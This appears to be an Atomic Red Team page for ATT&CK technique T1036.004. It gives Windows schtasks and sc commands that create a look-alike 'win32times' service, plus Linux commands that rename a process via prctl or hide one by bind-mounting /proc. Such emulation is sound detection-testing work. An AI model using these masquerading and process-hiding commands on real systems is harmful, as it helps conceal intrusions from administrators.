T1036.004.md

T1036.004 - Masquerading: Masquerade Task or Service

Description from ATT&CK

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)

Atomic Tests

• Atomic Test #1 - Creating W32Time similar named service using schtasks

• Atomic Test #2 - Creating W32Time similar named service using sc

• Atomic Test #3 - linux rename /proc/pid/comm using prctl

• Atomic Test #4 - Hiding a malicious process with bind mounts

Atomic Test #1 - Creating W32Time similar named service using schtasks

Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"

Supported Platforms: Windows

auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
schtasks /query /tn win32times

Cleanup Commands:

schtasks /tn win32times /delete /f

Atomic Test #2 - Creating W32Time similar named service using sc

Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"

Supported Platforms: Windows

auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
sc qc win32times

Cleanup Commands:

sc delete win32times

Atomic Test #3 - linux rename /proc/pid/comm using prctl

Runs a C program that calls prctl(PR_SET_NAME) to modify /proc/pid/comm value to "totally_legit". This will show up as process name in simple 'ps' listings.

Supported Platforms: Linux

auto_generated_guid: f0e3aaea-5cd9-4db6-a077-631dd19b27a8

Inputs:

Name	Description	Type	Default Value
exe_path	Output Binary Path	path	/tmp/T1036_004_prctl_rename

Attack Commands: Run with sh!

#{exe_path} & ps
TMP=`ps | grep totally_legit`
if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi
exit 0

Cleanup Commands:

rm -f #{exe_path}

Dependencies: Run with sh!

Description: #{exe_path} must be exist on system.

Check Prereq Commands:

stat #{exe_path}

Get Prereq Commands:

cc -o #{exe_path} PathToAtomicsFolder/T1036.004/src/prctl_rename.c

Atomic Test #4 - Hiding a malicious process with bind mounts

Creates a malicious process and hides it by bind mounting to the /proc filesystem of a benign process

Supported Platforms: Linux

auto_generated_guid: ad4b73c2-d6e2-4d8b-9868-4c6f55906e01

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

eval '(while true; do :; done) &'
echo $! > /tmp/evil_pid.txt
random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)

Cleanup Commands:

kill $(cat /tmp/evil_pid.txt) || echo "Failed to kill PID $evil_pid"
rm /tmp/evil_pid.txt